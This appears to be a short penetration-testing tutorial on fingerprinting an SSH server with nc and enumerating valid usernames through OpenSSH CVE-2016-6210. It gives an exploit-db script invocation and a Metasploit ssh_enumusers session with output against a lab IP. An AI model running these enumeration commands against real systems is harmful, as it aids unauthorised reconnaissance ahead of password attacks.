SSH is a very popular method to securely communicate with a remote host. SSH is old and basic technology so most recent versions are well secured. You can discover out the version of the SSH by scanning it with nmap or by connecting with it using nc.
nc 192.168.1.101 22
After connecting, you will get something like that, which reveal the SSH version:
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu1
OpenSSH Vulnerability: CVE-2016-6210
SSH before version 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.
Manual Exploit:
https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/remote/40136.py
python 40136.py 192.168.1.101 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10
Metasploit:
msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] 192.168.1.101:22 - SSH - Checking for false positives [*] 192.168.1.101:22 - SSH - Starting scan [-] 192.168.1.101:22 - SSH - User '4Dgifts' not found [-] 192.168.1.101:22 - SSH - User 'EZsetup' not found [-] 192.168.1.101:22 - SSH - User 'secure' not found
